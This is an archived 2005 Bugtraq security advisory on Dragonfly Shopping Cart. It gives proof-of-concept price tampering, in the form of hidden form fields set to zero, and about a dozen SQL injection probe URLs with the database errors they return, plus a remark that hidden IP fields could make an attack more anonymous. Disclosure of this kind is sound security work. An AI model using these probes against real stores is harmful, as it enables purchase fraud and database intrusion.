[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Dragonfly Shopping Cart Multiple vulnerabilities
From: dcrab () hackerscenter ! com
Date: 2005-07-12 8:53:52
Message-ID: 20050712085352.13762.qmail () securityfocus ! com
[Download RAW message or body]
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code \
them. Learn more at http://www.dbtech.org
Severity: High
Title: Dragonfly Shopping Cart Multiple vulnerabilities
Date: 11/07/2005
Vendor: DragonFly Shopping Cart
Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modifiying of \
prices along with Sql injection vulnerabilities.
Proof of Concept Exploits:
Hidden Price Value Vulnerability
You can modify these fields to modify the price of the product and thus be able to \
purchase the biggest and most expensive products for the cheapest possible prices, or \
even nothing.
/demo/dc_Categorieslist.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">
/demo/dc_Categoriesview.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">
/demo/dc_productslist.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">
/demo/dc_productslist_Clearance.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">
There are also many other hidden fields like ip address etc which can be used to make \
the attack "technically" more anonymous though any normal logging system would catch \
you ;).
Sql Injections
/demo/dc_Categoriesview.asp??key='&RecPerPage=5
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_Categoriesview.asp, line 1054
/demo/dc_Categoriesview.asp?key=%26dir%26
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'.
/demo/dc_Categoriesview.asp, line 1054
/demo/dc_productslist_Clearance.asp
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '([ProductActive] = 'show' AND \
([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND \
ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR \
[ProductDescriptionShort] LIKE '%1%') ' ))'.
/demo/dc_productslist_Clearance.asp, line 292
/demo/dc_productslist_Clearance.asp?cmd=%27
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '([ProductActive] = 'show' AND \
([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND \
ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR \
[ProductDescriptionShort] LIKE '%1%') ' ))'.
/demo/dc_productslist_Clearance.asp, line 292
/demo/ratings.asp??PID='
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression '[ProductKey]=''.
/demo/ratings.asp, line 68
/demo/dc_Productsview.asp
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_Productsview.asp, line 931
/demo/dc_forum_Postslist.asp?start='
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'nTotalRecs'
/demo/dc_forum_Postslist.asp, line 319
/demo/dc_forum_Postslist.asp?key_m='
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200
/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200
/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure \
coding with php.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic